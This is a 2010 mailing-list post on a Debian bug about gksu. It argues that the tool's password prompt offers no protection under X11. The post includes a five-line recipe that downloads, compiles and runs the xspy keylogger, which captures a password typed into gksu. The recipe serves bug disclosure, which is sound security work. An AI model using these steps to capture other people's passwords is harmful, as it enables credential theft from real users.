Bug#474024: Fixed upstream?
Yury V. Zaytsev
yury at shurup.com
Sat Oct 30 21:36:55 UTC 2010
Hi!
Another fine example:
$ wget ftp://ftp.freebsd.org/pub/FreeBSD/ports/distfiles/xspy-1.0c.tar.gz
$ tar -xzvf xspy-1.0c.tar.gz
$ gcc *.c -lX11 -DNULL=0 -o xspy
$ ./xspy
$ gksu /bin/true
Enjoy reading your password and there's even no need to ptrace anything:
just query the keymap repeatedly and that's it. Maybe worth to note,
that this "exploit" has been out there for 8 years, at least...
Considering the above, I would actually claim that gksu IS ineffective
as it is shipped now and I can't see how this issue could possibly be
fixed-upstream by applying a patch adding a warning to the man page.
Hmmm...
--
Sincerely yours,
Yury V. Zaytsev
More information about the pkg-gnome-maintainers
mailing list